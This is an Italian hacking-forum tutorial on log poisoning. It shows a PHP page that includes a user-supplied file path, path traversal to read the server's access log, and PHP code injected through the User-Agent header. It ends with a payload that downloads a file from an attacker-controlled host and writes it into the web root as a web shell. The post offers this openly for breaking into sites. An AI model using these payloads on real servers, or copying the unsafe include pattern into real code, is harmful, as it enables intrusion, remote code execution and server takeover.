Log Poisoning

Stato
Discussione chiusa ad ulteriori risposte.

EvilMau

Utente Silver
25 Gennaio 2011
8
1
0
51
Salve a tutti, scrivo questo topic spiegando cosa è il log poisoning e inoltre cercherò di essere più chiaro possibile ^^
PS: Weed se trovi errori o imprecisioni avvisami poichè è tutta mia sta guida XD
allora : cosa è il log poisoning

Come si può intuire dal nome c'entrano i file log ma andiamo vedere bene nel dettaglio
facciamo finta che un sito abbia un LFI nel suo sito, ossia Local File Inclusion, e quindi possiamo vedere circa i file presenti dentro il sito , il demone HTTP salva i log molto spesso dentro una cartella logs, quindi potremo, usando un attacco apparentemente innoquo per la sicurezza di un server, avere accesso al server proprio, ok iniziamo, allora come ben sapete local file inclusion si applica molto spesso usando
Codice:
..
che significa che deve salire di una directory, ok facciamo un esempio pratico perchè sono pessimo con le parole:
immaginiamo un sito con questa mappa:
Codice:
index.php
logs/
      access.log
contents/
       io.php
       prog.php
       ...
e che il sito sia stato fatto maluccio ossia: per aprire la pagina io.php bisogna usare:
Codice:
index.php?page=io.php
che dentro l'index ci sarà una funzione che si occuperà di includerla tipo cosi:
Codice:
$page = $_GET['page'];
$url = "contents/" . $page;
include($url);
e tutto sarebe apposto se non fosse per il fatto che se noi inseriamo:
Codice:
index.php?page=../index.php
Facciamo Andare Down il server :p ma quelli sono dettagli ma la cosa che ci interessa di piu è il fatto che possiamo avere accesso ai log semplicemente inserendo questo url:
Codice:
index.php?page=../logs/access.log
e cosa ci troviamo di fronte? semplice!
dei log analizziamo bene cosa viene salvato nei log, se sono tipo questo:
Codice:
237.123.322.12 - - [01/Feb/2010:21:35:12 -0600] "GET /index.php HTTP/1.1" 200 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
possiamo dire che il nostro server è vulnerabile a log poisoning, perchè? semplice perchè viene salvato pure l'user agent, proviamo a modificare user agent ( c'e anche un famoso plugin per FF ) e inseriamoci tipo:
Codice:
<?php echo "ciao"; ?>
e andiamo a vedere cosa lascia nei log la nostra richiesta se ci troviamo di fronte tipo:
Codice:
237.123.322.12 - - [01/Feb/2010:21:35:12 -0600] "GET /index.php HTTP/1.1" 200 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11)   ciao"
vuol dire che il server è vulnerabile ^^

ok e quindi ora? , semplice :)
ora si può modificare l'useragent e inserirci tipo:
Codice:
<?php fwrite(fopen('../www/shell.php','w'), file_get_contents('http://miashell.mine/lol.txt')); die; ?>
Cosi abbiamo uppato la nostra shell :)
 
Stato
Discussione chiusa ad ulteriori risposte.